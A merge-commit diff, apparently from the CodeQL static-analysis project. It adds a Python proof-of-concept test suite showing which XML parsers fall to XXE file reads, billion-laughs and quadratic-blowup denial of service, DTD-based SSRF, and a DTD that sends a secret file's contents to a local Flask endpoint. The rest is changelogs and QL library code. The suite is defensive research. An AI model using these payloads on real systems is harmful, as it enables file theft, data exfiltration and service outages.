Merge branch 'main' into py/CsvInjection

yoff
2022-05-25 10:43:08 +02:00
committed by GitHub
6918 changed files with 534741 additions and 123456 deletions

python/PoCs/README.md

@@ -0,0 +1 @@
A place to collect proof of concept for how certain vulnerabilities work.


@@ -0,0 +1,714 @@
#!/usr/bin/env python3
# this file doesn't have a .py extension, so the extractor doesn't pick it up and it
# doesn't have to be annotated
# This file shows ways to exploit vulnerable XML parsing
# see
# https://pypi.org/project/defusedxml/#python-xml-libraries
# https://docs.python.org/3.10/library/xml.html#xml-vulnerabilities
import pathlib
from flask import Flask
import threading
import multiprocessing
import time
from io import StringIO
import pytest
HOST = "localhost"
PORT = 8080
FLAG_PATH = pathlib.Path(__file__).with_name("flag")
# ==============================================================================
# xml samples
ok_xml = f"""<?xml version="1.0"?>
<test>hello world</test>
"""
local_xxe = f"""<?xml version="1.0"?>
<!DOCTYPE dt [
<!ENTITY xxe SYSTEM "file://{FLAG_PATH}">
]>
<test>&xxe;</test>
"""
remote_xxe = f"""<?xml version="1.0"?>
<!DOCTYPE dt [
<!ENTITY remote_xxe SYSTEM "http://{HOST}:{PORT}/xxe">
]>
<test>&remote_xxe;</test>
"""
billion_laughs = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>"""
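# quadratic blowup: one ~100 kB entity referenced 20,000 times, which expands to
# roughly 2 GB of text without any nested entity definitions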
quadratic_blowup = f"""<?xml version="1.0"?>
<!DOCTYPE wolo [
<!ENTITY oops "{"a" * 100000}">
]>
<foo>{"&oops;"*20000}</foo>"""
dtd_retrieval = f"""<?xml version="1.0"?>
<!DOCTYPE dt PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://{HOST}:{PORT}/test.dtd">
<foo>bar</foo>
"""
exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
"""
predefined_entity_xml = """<?xml version="1.0"?>
<test>&lt;</test>
"""
# ==============================================================================
# other setup
# we set up a local Flask application so we can test whether loading external resources
# works (such as SSRF via DTD retrieval)
app = Flask(__name__)
@app.route("/alive")
def alive():
return "ok"
hit_dtd = False
@app.route("/test.dtd")
def test_dtd():
global hit_dtd
hit_dtd = True
return """<?xml version="1.0" encoding="UTF-8"?>"""
hit_xxe = False
@app.route("/xxe")
def test_xxe():
global hit_xxe
hit_xxe = True
return "ok"
@app.route("/exfiltrate-through.dtd")
def exfiltrate_through_dtd():
return f"""<!ENTITY % file SYSTEM "file://{FLAG_PATH}">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://{HOST}:{PORT}/exfiltrate-data?data=%file;'>">
%eval;
%exfiltrate;
"""
exfiltrated_data = None
@app.route("/exfiltrate-data")
def exfiltrate_data():
from flask import request
global exfiltrated_data
exfiltrated_data = request.args["data"]
return "ok"
def run_app():
app.run(host=HOST, port=PORT)
@pytest.fixture(scope="session", autouse=True)
def flask_app_running():
# run flask in other thread
flask_thread = threading.Thread(target=run_app, daemon=True)
flask_thread.start()
# give flask a bit of time to start
time.sleep(0.1)
# ensure that the server works
import requests
requests.get(f"http://{HOST}:{PORT}/alive")
yield
def expects_timeout(func):
def inner():
proc = multiprocessing.Process(target=func)
proc.start()
time.sleep(0.1)
assert proc.exitcode == None
proc.kill()
proc.join()
return inner
class TestExpectsTimeout:
"test that expects_timeout works as expected"
@staticmethod
@expects_timeout
def test_slow():
time.sleep(1000)
@staticmethod
def test_fast():
@expects_timeout
def fast_func():
return "done!"
with pytest.raises(AssertionError):
fast_func()
# ==============================================================================
import xml.sax
import xml.sax.handler
class SimpleHandler(xml.sax.ContentHandler):
def __init__(self):
self.result = []
def characters(self, data):
self.result.append(data)
class TestSax():
# always vuln to billion laughs, quadratic
@staticmethod
@expects_timeout
def test_billion_laughs_allowed_by_default():
parser = xml.sax.make_parser()
parser.parse(StringIO(billion_laughs))
@staticmethod
@expects_timeout
def test_quadratic_blowup_allowed_by_default():
parser = xml.sax.make_parser()
parser.parse(StringIO(quadratic_blowup))
@staticmethod
def test_ok_xml():
handler = SimpleHandler()
parser = xml.sax.make_parser()
parser.setContentHandler(handler)
parser.parse(StringIO(ok_xml))
assert handler.result == ["hello world"], handler.result
@staticmethod
def test_xxe_disabled_by_default():
handler = SimpleHandler()
parser = xml.sax.make_parser()
parser.setContentHandler(handler)
parser.parse(StringIO(local_xxe))
assert handler.result == [], handler.result
@staticmethod
def test_local_xxe_manually_enabled():
handler = SimpleHandler()
parser = xml.sax.make_parser()
parser.setContentHandler(handler)
parser.setFeature(xml.sax.handler.feature_external_ges, True)
parser.parse(StringIO(local_xxe))
assert handler.result[0] == "SECRET_FLAG", handler.result
@staticmethod
def test_remote_xxe_manually_enabled():
global hit_xxe
hit_xxe = False
handler = SimpleHandler()
parser = xml.sax.make_parser()
parser.setContentHandler(handler)
parser.setFeature(xml.sax.handler.feature_external_ges, True)
parser.parse(StringIO(remote_xxe))
assert handler.result == ["ok"], handler.result
assert hit_xxe == True
@staticmethod
def test_dtd_disabled_by_default():
global hit_dtd
hit_dtd = False
parser = xml.sax.make_parser()
parser.parse(StringIO(dtd_retrieval))
assert hit_dtd == False
@staticmethod
def test_dtd_manually_enabled():
global hit_dtd
hit_dtd = False
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
parser.parse(StringIO(dtd_retrieval))
assert hit_dtd == True
# ==============================================================================
import xml.etree.ElementTree
class TestEtree:
# always vuln to billion laughs, quadratic
@staticmethod
@expects_timeout
def test_billion_laughs_allowed_by_default():
parser = xml.etree.ElementTree.XMLParser()
_root = xml.etree.ElementTree.fromstring(billion_laughs, parser=parser)
@staticmethod
@expects_timeout
def test_quadratic_blowup_allowed_by_default():
parser = xml.etree.ElementTree.XMLParser()
_root = xml.etree.ElementTree.fromstring(quadratic_blowup, parser=parser)
@staticmethod
def test_ok_xml():
parser = xml.etree.ElementTree.XMLParser()
root = xml.etree.ElementTree.fromstring(ok_xml, parser=parser)
assert root.tag == "test"
assert root.text == "hello world"
@staticmethod
def test_ok_xml_sax_parser():
# you _can_ pass a SAX parser to xml.etree... but it doesn't give you the output :|
parser = xml.sax.make_parser()
root = xml.etree.ElementTree.fromstring(ok_xml, parser=parser)
assert root == None
@staticmethod
def test_ok_xml_lxml_parser():
# this is technically possible, since parsers follow the same API, and the
# `fromstring` function is just a thin wrapper... seems very unlikely that
# anyone would do this though :|
parser = lxml.etree.XMLParser()
root = xml.etree.ElementTree.fromstring(ok_xml, parser=parser)
assert root.tag == "test"
assert root.text == "hello world"
@staticmethod
def test_xxe_not_possible():
parser = xml.etree.ElementTree.XMLParser()
try:
_root = xml.etree.ElementTree.fromstring(local_xxe, parser=parser)
assert False
except xml.etree.ElementTree.ParseError as e:
assert "undefined entity &xxe" in str(e)
@staticmethod
def test_dtd_not_possible():
global hit_dtd
hit_dtd = False
parser = xml.etree.ElementTree.XMLParser()
_root = xml.etree.ElementTree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == False
# ==============================================================================
import lxml.etree
class TestLxml:
# see https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.XMLParser
@staticmethod
def test_billion_laughs_disabled_by_default():
parser = lxml.etree.XMLParser()
try:
_root = lxml.etree.fromstring(billion_laughs, parser=parser)
assert False
except lxml.etree.XMLSyntaxError as e:
assert "Detected an entity reference loop" in str(e)
@staticmethod
def test_quadratic_blowup_disabled_by_default():
parser = lxml.etree.XMLParser()
try:
_root = lxml.etree.fromstring(quadratic_blowup, parser=parser)
assert False
except lxml.etree.XMLSyntaxError as e:
assert "Detected an entity reference loop" in str(e)
@staticmethod
@expects_timeout
def test_billion_laughs_manually_enabled():
parser = lxml.etree.XMLParser(huge_tree=True)
root = lxml.etree.fromstring(billion_laughs, parser=parser)
@staticmethod
@expects_timeout
def test_quadratic_blowup_manually_enabled():
parser = lxml.etree.XMLParser(huge_tree=True)
root = lxml.etree.fromstring(quadratic_blowup, parser=parser)
@staticmethod
def test_billion_laughs_huge_tree_not_enough():
parser = lxml.etree.XMLParser(huge_tree=True, resolve_entities=False)
root = lxml.etree.fromstring(billion_laughs, parser=parser)
assert root.tag == "lolz"
assert root.text == None
@staticmethod
def test_quadratic_blowup_huge_tree_not_enough():
parser = lxml.etree.XMLParser(huge_tree=True, resolve_entities=False)
root = lxml.etree.fromstring(quadratic_blowup, parser=parser)
assert root.tag == "foo"
assert root.text == None
@staticmethod
def test_ok_xml():
parser = lxml.etree.XMLParser()
root = lxml.etree.fromstring(ok_xml, parser=parser)
assert root.tag == "test"
assert root.text == "hello world"
@staticmethod
def test_local_xxe_enabled_by_default():
parser = lxml.etree.XMLParser()
root = lxml.etree.fromstring(local_xxe, parser=parser)
assert root.tag == "test"
assert root.text == "SECRET_FLAG", root.text
@staticmethod
def test_local_xxe_disabled():
parser = lxml.etree.XMLParser(resolve_entities=False)
root = lxml.etree.fromstring(local_xxe, parser=parser)
assert root.tag == "test"
assert root.text == None
@staticmethod
def test_remote_xxe_disabled_by_default():
global hit_xxe
hit_xxe = False
parser = lxml.etree.XMLParser()
root = lxml.etree.fromstring(remote_xxe, parser=parser)
assert hit_xxe == False
@staticmethod
def test_remote_xxe_manually_enabled():
global hit_xxe
hit_xxe = False
parser = lxml.etree.XMLParser(no_network=False)
root = lxml.etree.fromstring(remote_xxe, parser=parser)
assert root.tag == "test"
assert root.text == "ok"
assert hit_xxe == True
@staticmethod
def test_dtd_disabled_by_default():
global hit_dtd
hit_dtd = False
parser = lxml.etree.XMLParser()
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == False
@staticmethod
def test_dtd_manually_enabled():
global hit_dtd
hit_dtd = False
# Need to set BOTH load_dtd and no_network
parser = lxml.etree.XMLParser(load_dtd=True)
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == False
parser = lxml.etree.XMLParser(no_network=False)
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == False
parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == True
hit_dtd = False
# Setting dtd_validation also does not allow the remote access
parser = lxml.etree.XMLParser(dtd_validation=True, load_dtd=True)
try:
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
except lxml.etree.XMLSyntaxError:
pass
assert hit_dtd == False
@staticmethod
def test_exfiltrate_through_dtd():
# note that this only works when the data to exfiltrate does not contain a newline,
# since the flag's content ends up embedded in the URL of the exfiltration request :|
global exfiltrated_data
exfiltrated_data = None
parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
with pytest.raises(lxml.etree.XMLSyntaxError):
lxml.etree.fromstring(exfiltrate_through_dtd_retrieval, parser=parser)
assert exfiltrated_data == "SECRET_FLAG"
@staticmethod
def test_predefined_entity():
parser = lxml.etree.XMLParser(resolve_entities=False)
root = lxml.etree.fromstring(predefined_entity_xml, parser=parser)
assert root.tag == "test"
assert root.text == "<"
# ==============================================================================
import xmltodict
class TestXmltodict:
@staticmethod
def test_billion_laughs_disabled_by_default():
d = xmltodict.parse(billion_laughs)
assert d == {"lolz": None}, d
@staticmethod
def test_quadratic_blowup_disabled_by_default():
d = xmltodict.parse(quadratic_blowup)
assert d == {"foo": None}, d
@staticmethod
@expects_timeout
def test_billion_laughs_manually_enabled():
xmltodict.parse(billion_laughs, disable_entities=False)
@staticmethod
@expects_timeout
def test_quadratic_blowup_manually_enabled():
xmltodict.parse(quadratic_blowup, disable_entities=False)
@staticmethod
def test_ok_xml():
d = xmltodict.parse(ok_xml)
assert d == {"test": "hello world"}, d
@staticmethod
def test_local_xxe_not_possible():
d = xmltodict.parse(local_xxe)
assert d == {"test": None}
d = xmltodict.parse(local_xxe, disable_entities=False)
assert d == {"test": None}
@staticmethod
def test_remote_xxe_not_possible():
global hit_xxe
hit_xxe = False
d = xmltodict.parse(remote_xxe)
assert d == {"test": None}
assert hit_xxe == False
d = xmltodict.parse(remote_xxe, disable_entities=False)
assert d == {"test": None}
assert hit_xxe == False
@staticmethod
def test_dtd_not_possible():
global hit_dtd
hit_dtd = False
d = xmltodict.parse(dtd_retrieval)
assert hit_dtd == False
# ==============================================================================
import xml.dom.minidom
class TestMinidom:
@staticmethod
@expects_timeout
def test_billion_laughs():
xml.dom.minidom.parseString(billion_laughs)
@staticmethod
@expects_timeout
def test_quadratic_blowup():
xml.dom.minidom.parseString(quadratic_blowup)
@staticmethod
def test_ok_xml():
doc = xml.dom.minidom.parseString(ok_xml)
assert doc.documentElement.tagName == "test"
assert doc.documentElement.childNodes[0].data == "hello world"
@staticmethod
def test_xxe():
# disabled by default
doc = xml.dom.minidom.parseString(local_xxe)
assert doc.documentElement.tagName == "test"
assert doc.documentElement.childNodes == []
# but can be turned on
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
doc = xml.dom.minidom.parseString(local_xxe, parser=parser)
assert doc.documentElement.tagName == "test"
assert doc.documentElement.childNodes[0].data == "SECRET_FLAG"
# which also works remotely
global hit_xxe
hit_xxe = False
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
_doc = xml.dom.minidom.parseString(remote_xxe, parser=parser)
assert hit_xxe == True
@staticmethod
def test_dtd():
# not possible by default
global hit_dtd
hit_dtd = False
_doc = xml.dom.minidom.parseString(dtd_retrieval)
assert hit_dtd == False
# but can be turned on
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
_doc = xml.dom.minidom.parseString(dtd_retrieval, parser=parser)
assert hit_dtd == True
# ==============================================================================
import xml.dom.pulldom
class TestPulldom:
@staticmethod
@expects_timeout
def test_billion_laughs():
doc = xml.dom.pulldom.parseString(billion_laughs)
# you NEED to iterate over the items for the parse to take a long time
for event, node in doc:
pass
@staticmethod
@expects_timeout
def test_quadratic_blowup():
doc = xml.dom.pulldom.parseString(quadratic_blowup)
for event, node in doc:
pass
@staticmethod
def test_ok_xml():
doc = xml.dom.pulldom.parseString(ok_xml)
for event, node in doc:
if event == xml.dom.pulldom.START_ELEMENT:
assert node.tagName == "test"
elif event == xml.dom.pulldom.CHARACTERS:
assert node.data == "hello world"
@staticmethod
def test_xxe():
# disabled by default
doc = xml.dom.pulldom.parseString(local_xxe)
found_flag = False
for event, node in doc:
if event == xml.dom.pulldom.START_ELEMENT:
assert node.tagName == "test"
elif event == xml.dom.pulldom.CHARACTERS:
if node.data == "SECRET_FLAG":
found_flag = True
assert found_flag == False
# but can be turned on
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
doc = xml.dom.pulldom.parseString(local_xxe, parser=parser)
found_flag = False
for event, node in doc:
if event == xml.dom.pulldom.START_ELEMENT:
assert node.tagName == "test"
elif event == xml.dom.pulldom.CHARACTERS:
if node.data == "SECRET_FLAG":
found_flag = True
assert found_flag == True
# which also works remotely
global hit_xxe
hit_xxe = False
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
doc = xml.dom.pulldom.parseString(remote_xxe, parser=parser)
assert hit_xxe == False
for event, node in doc:
pass
assert hit_xxe == True
@staticmethod
def test_dtd():
# not possible by default
global hit_dtd
hit_dtd = False
doc = xml.dom.pulldom.parseString(dtd_retrieval)
for event, node in doc:
pass
assert hit_dtd == False
# but can be turned on
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
doc = xml.dom.pulldom.parseString(dtd_retrieval, parser=parser)
for event, node in doc:
pass
assert hit_dtd == True
# ==============================================================================
import xml.parsers.expat
class TestExpat:
# this is the underlying parser implementation used by the other XML modules in the
# standard library, but people are probably not using it directly.
@staticmethod
@expects_timeout
def test_billion_laughs():
parser = xml.parsers.expat.ParserCreate()
parser.Parse(billion_laughs, True)
@staticmethod
@expects_timeout
def test_quadratic_blowup():
parser = xml.parsers.expat.ParserCreate()
parser.Parse(quadratic_blowup, True)
@staticmethod
def test_ok_xml():
char_data_recv = []
def char_data_handler(data):
char_data_recv.append(data)
parser = xml.parsers.expat.ParserCreate()
parser.CharacterDataHandler = char_data_handler
parser.Parse(ok_xml, True)
assert char_data_recv == ["hello world"]
@staticmethod
def test_xxe():
# not vuln by default
char_data_recv = []
def char_data_handler(data):
char_data_recv.append(data)
parser = xml.parsers.expat.ParserCreate()
parser.CharacterDataHandler = char_data_handler
parser.Parse(local_xxe, True)
assert char_data_recv == []
# there might be ways to make it vuln, but I did not investigate further.
@staticmethod
def test_dtd():
# not vuln by default
global hit_dtd
hit_dtd = False
parser = xml.parsers.expat.ParserCreate()
parser.Parse(dtd_retrieval, True)
assert hit_dtd == False
# there might be ways to make it vuln, but I did not investigate further.
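# ==============================================================================
# For comparison, a minimal sketch (not part of the original PoC) of how the
# defusedxml package referenced in the header behaves on the same payloads.
# It assumes defusedxml is installed; entity declarations are refused by default,
# which covers the XXE and entity-expansion samples above.
import defusedxml
import defusedxml.ElementTree
class TestDefusedxmlSketch:
    @staticmethod
    def test_ok_xml():
        root = defusedxml.ElementTree.fromstring(ok_xml)
        assert root.tag == "test"
        assert root.text == "hello world"
    @staticmethod
    def test_entity_declarations_rejected():
        # local_xxe, billion_laughs and quadratic_blowup all declare entities,
        # which defusedxml forbids out of the box
        for payload in (local_xxe, billion_laughs, quadratic_blowup):
            with pytest.raises(defusedxml.EntitiesForbidden):
                defusedxml.ElementTree.fromstring(payload)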


@@ -0,0 +1 @@
SECRET_FLAG


@@ -1,3 +1,81 @@
## 0.3.0
### Breaking Changes
* The imports made available from `import python` are no longer exposed under `DataFlow::` after doing `import semmle.python.dataflow.new.DataFlow`, for example using `DataFlow::Add` will now cause a compile error.
### Minor Analysis Improvements
* The modeling of `request.files` in Flask has been fixed, so we now properly handle assignments to local variables (such as `files = request.files; files['key'].filename`).
* Added taint propagation for `io.StringIO` and `io.BytesIO`. This addition was originally [submitted as part of an experimental query by @jorgectf](https://github.com/github/codeql/pull/6112).
## 0.2.0
### Breaking Changes
* The signature of `allowImplicitRead` on `DataFlow::Configuration` and `TaintTracking::Configuration` has changed from `allowImplicitRead(DataFlow::Node node, DataFlow::Content c)` to `allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c)`.
## 0.1.0
### Breaking Changes
* The recently added flow-state versions of `isBarrierIn`, `isBarrierOut`, `isSanitizerIn`, and `isSanitizerOut` in the data flow and taint tracking libraries have been removed.
### Deprecated APIs
* Queries importing a data-flow configuration from `semmle.python.security.dataflow`
should ensure that the imported file ends with `Query`, and only import its top-level
module. For example, a query that used `CommandInjection::Configuration` from
`semmle.python.security.dataflow.CommandInjection` should from now on use `Configuration`
from `semmle.python.security.dataflow.CommandInjectionQuery` instead.
### Major Analysis Improvements
* Added data-flow for Django ORM models that are saved in a database (no `models.ForeignKey` support).
### Minor Analysis Improvements
* Improved modeling of Flask `Response` objects, so passing a response body with the keyword argument `response` is now recognized.
## 0.0.13
## 0.0.12
### Breaking Changes
* The flow state variants of `isBarrier` and `isAdditionalFlowStep` are no longer exposed in the taint tracking library. The `isSanitizer` and `isAdditionalTaintStep` predicates should be used instead.
### Deprecated APIs
* Many classes/predicates/modules that had upper-case acronyms have been renamed to follow our style-guide.
The old name still exists as a deprecated alias.
* Some modules that started with a lowercase letter have been renamed to follow our style-guide.
The old name still exists as a deprecated alias.
### New Features
* The data flow and taint tracking libraries have been extended with versions of `isBarrierIn`, `isBarrierOut`, and `isBarrierGuard`, respectively `isSanitizerIn`, `isSanitizerOut`, and `isSanitizerGuard`, that support flow states.
### Minor Analysis Improvements
* All deprecated predicates/classes/modules that have been deprecated for over a year have been deleted.
## 0.0.11
### Minor Analysis Improvements
* Added new SSRF sinks for `httpx`, `pycurl`, `urllib`, `urllib2`, `urllib3`, and `libtaxii`. This improvement was [submitted by @haby0](https://github.com/github/codeql/pull/8275).
* The regular expression parser now groups sequences of normal characters. This reduces the number of instances of `RegExpNormalChar`.
* Fixed taint propagation for attribute assignment. In the assignment `x.foo = tainted` we no longer treat the entire object `x` as tainted, just because the attribute `foo` contains tainted data. This leads to slightly fewer false positives.
* Improved analysis of attributes for data-flow and taint tracking queries, so `getattr`/`setattr` are supported, and a write to an attribute properly stops flow for the old value in that attribute.
* Added post-update nodes (`DataFlow::PostUpdateNode`) for arguments in calls that can't be resolved.
## 0.0.10
### Deprecated APIs
* The old points-to based modeling has been deprecated. Use the new type-tracking/API-graphs based modeling instead.
## 0.0.9
## 0.0.8


@@ -1,4 +0,0 @@
---
category: minorAnalysis
---
* Fixed taint propagation for attribute assignment. In the assignment `x.foo = tainted` we no longer treat the entire object `x` as tainted, just because the attribute `foo` contains tainted data. This leads to slightly fewer false positives.


@@ -0,0 +1,4 @@
---
category: breaking
---
`API::moduleImport` no longer has any results for dotted names, such as `API::moduleImport("foo.bar")`. Using `API::moduleImport("foo.bar").getMember("baz").getACall()` previously worked if the Python code was `from foo.bar import baz; baz()`, but not if the code was `import foo.bar; foo.bar.baz()` -- we are making this change to ensure the approach that can handle all cases is always used.


@@ -1,4 +1,5 @@
---
category: deprecated
---
## 0.0.10
### Deprecated APIs
* The old points-to based modeling has been deprecated. Use the new type-tracking/API-graphs based modeling instead.


@@ -0,0 +1,9 @@
## 0.0.11
### Minor Analysis Improvements
* Added new SSRF sinks for `httpx`, `pycurl`, `urllib`, `urllib2`, `urllib3`, and `libtaxii`. This improvement was [submitted by @haby0](https://github.com/github/codeql/pull/8275).
* The regular expression parser now groups sequences of normal characters. This reduces the number of instances of `RegExpNormalChar`.
* Fixed taint propagation for attribute assignment. In the assignment `x.foo = tainted` we no longer treat the entire object `x` as tainted, just because the attribute `foo` contains tainted data. This leads to slightly fewer false positives.
* Improved analysis of attributes for data-flow and taint tracking queries, so `getattr`/`setattr` are supported, and a write to an attribute properly stops flow for the old value in that attribute.
* Added post-update nodes (`DataFlow::PostUpdateNode`) for arguments in calls that can't be resolved.


@@ -0,0 +1,20 @@
## 0.0.12
### Breaking Changes
* The flow state variants of `isBarrier` and `isAdditionalFlowStep` are no longer exposed in the taint tracking library. The `isSanitizer` and `isAdditionalTaintStep` predicates should be used instead.
### Deprecated APIs
* Many classes/predicates/modules that had upper-case acronyms have been renamed to follow our style-guide.
The old name still exists as a deprecated alias.
* Some modules that started with a lowercase letter have been renamed to follow our style-guide.
The old name still exists as a deprecated alias.
### New Features
* The data flow and taint tracking libraries have been extended with versions of `isBarrierIn`, `isBarrierOut`, and `isBarrierGuard`, respectively `isSanitizerIn`, `isSanitizerOut`, and `isSanitizerGuard`, that support flow states.
### Minor Analysis Improvements
* All deprecated predicates/classes/modules that have been deprecated for over a year have been deleted.


@@ -0,0 +1 @@
## 0.0.13


@@ -0,0 +1,21 @@
## 0.1.0
### Breaking Changes
* The recently added flow-state versions of `isBarrierIn`, `isBarrierOut`, `isSanitizerIn`, and `isSanitizerOut` in the data flow and taint tracking libraries have been removed.
### Deprecated APIs
* Queries importing a data-flow configuration from `semmle.python.security.dataflow`
should ensure that the imported file ends with `Query`, and only import its top-level
module. For example, a query that used `CommandInjection::Configuration` from
`semmle.python.security.dataflow.CommandInjection` should from now on use `Configuration`
from `semmle.python.security.dataflow.CommandInjectionQuery` instead.
### Major Analysis Improvements
* Added data-flow for Django ORM models that are saved in a database (no `models.ForeignKey` support).
### Minor Analysis Improvements
* Improved modeling of Flask `Response` objects, so passing a response body with the keyword argument `response` is now recognized.


@@ -0,0 +1,5 @@
## 0.2.0
### Breaking Changes
* The signature of `allowImplicitRead` on `DataFlow::Configuration` and `TaintTracking::Configuration` has changed from `allowImplicitRead(DataFlow::Node node, DataFlow::Content c)` to `allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c)`.


@@ -0,0 +1,10 @@
## 0.3.0
### Breaking Changes
* The imports made available from `import python` are no longer exposed under `DataFlow::` after doing `import semmle.python.dataflow.new.DataFlow`, for example using `DataFlow::Add` will now cause a compile error.
### Minor Analysis Improvements
* The modeling of `request.files` in Flask has been fixed, so we now properly handle assignments to local variables (such as `files = request.files; files['key'].filename`).
* Added taint propagation for `io.StringIO` and `io.BytesIO`. This addition was originally [submitted as part of an experimental query by @jorgectf](https://github.com/github/codeql/pull/6112).


@@ -1,2 +1,2 @@
---
lastReleaseVersion: 0.0.9
lastReleaseVersion: 0.3.0


@@ -1,5 +1,5 @@
name: codeql/python-all
version: 0.0.10-dev
version: 0.3.1-dev
groups: python
dbscheme: semmlecode.python.dbscheme
extractor: python


@@ -6,8 +6,10 @@
* directed and labeled; they specify how the components represented by nodes relate to each other.
*/
private import python
// Importing python under the `PY` namespace to avoid importing `CallNode` from `Flow.qll` and thereby having a naming conflict with `API::CallNode`.
private import python as PY
import semmle.python.dataflow.new.DataFlow
private import semmle.python.internal.CachedStages
/**
* Provides classes and predicates for working with APIs used in a database.
@@ -39,6 +41,30 @@ module API {
)
}
/**
* Gets a data-flow node corresponding to the right-hand side of a definition of the API
* component represented by this node.
*
* For example, in the property write `foo.bar = x`, variable `x` is the right-hand side
* of a write to the `bar` property of `foo`.
*
* Note that for parameters, it is the arguments flowing into that parameter that count as
* right-hand sides of the definition, not the declaration of the parameter itself.
* Consequently, in:
* ```python
* from mypkg import foo;
* foo.bar(x)
* ```
* `x` is the right-hand side of a definition of the first parameter of `bar` from the `mypkg.foo` module.
*/
DataFlow::Node getARhs() { Impl::rhs(this, result) }
/**
* Gets a data-flow node that may interprocedurally flow to the right-hand side of a definition
* of the API component represented by this node.
*/
DataFlow::Node getAValueReachingRhs() { result = Impl::trackDefNode(this.getARhs()) }
/**
* Gets an immediate use of the API component represented by this node.
*
@@ -55,7 +81,7 @@ module API {
/**
* Gets a call to the function represented by this API component.
*/
DataFlow::CallCfgNode getACall() { result = this.getReturn().getAnImmediateUse() }
CallNode getACall() { result = this.getReturn().getAnImmediateUse() }
/**
* Gets a node representing member `m` of this API component.
@@ -92,6 +118,29 @@ module API {
*/
Node getReturn() { result = this.getASuccessor(Label::return()) }
/**
* Gets a node representing the `i`th parameter of the function represented by this node.
*
* This predicate may have multiple results when there are multiple invocations of this API component.
* Consider using `getAnInvocation()` if there is a need to distinguish between individual calls.
*/
Node getParameter(int i) { result = this.getASuccessor(Label::parameter(i)) }
/**
* Gets the node representing the keyword parameter `name` of the function represented by this node.
*
* This predicate may have multiple results when there are multiple invocations of this API component.
* Consider using `getAnInvocation()` if there is a need to distinguish between individual calls.
*/
Node getKeywordParameter(string name) {
result = this.getASuccessor(Label::keywordParameter(name))
}
/**
* Gets the number of parameters of the function represented by this node.
*/
int getNumParameter() { result = max(int s | exists(this.getParameter(s))) + 1 }
/**
* Gets a node representing a subclass of the class represented by this node.
*/
@@ -137,7 +186,7 @@ module API {
/**
* Gets the data-flow node that gives rise to this node, if any.
*/
DataFlow::Node getInducingNode() { this = Impl::MkUse(result) }
DataFlow::Node getInducingNode() { this = Impl::MkUse(result) or this = Impl::MkDef(result) }
/**
* Holds if this element is at the specified location.
@@ -210,6 +259,17 @@ module API {
}
}
/** A node corresponding to the rhs of an API component. */
class Def extends Node, Impl::TDef {
override string toString() {
exists(string type | this = Impl::MkDef(_) and type = "Def " |
result = type + this.getPath()
or
not exists(this.getPath()) and result = type + "with no path"
)
}
}
/** Gets the root node. */
Root root() { any() }
@@ -220,11 +280,73 @@ module API {
* you should use `.getMember` on the parent module. For example, for nodes corresponding to the module `foo.bar`,
* use `moduleImport("foo").getMember("bar")`.
*/
Node moduleImport(string m) { result = Impl::MkModuleImport(m) }
Node moduleImport(string m) {
result = Impl::MkModuleImport(m) and
// restrict `moduleImport` so it will never give results for a dotted name. Note
// that we cannot move this logic to the `MkModuleImport` construction, since we
// need the intermediate API graph nodes for the prefixes in `import foo.bar.baz`.
not m.matches("%.%")
}
/** Gets a node corresponding to the built-in with the given name, if any. */
Node builtin(string n) { result = moduleImport("builtins").getMember(n) }
/**
* A `CallCfgNode` that is connected to the API graph.
*
* Can be used to reason about calls to an external API in which the correlation between
* parameters and/or return values must be retained.
*
* The member predicates `getParameter`, `getKeywordParameter`, `getReturn`, and `getInstance` mimic
* the corresponding predicates from `API::Node`. These are guaranteed to exist and be unique to this call.
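*
* For example (an illustrative Python snippet, not taken from this file), for a call
* like `requests.get(url, verify=False)` one may want to relate the `verify` keyword
* argument and the return value of that particular call to each other.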
*/
class CallNode extends DataFlow::CallCfgNode {
API::Node callee;
CallNode() { this = callee.getReturn().getAnImmediateUse() }
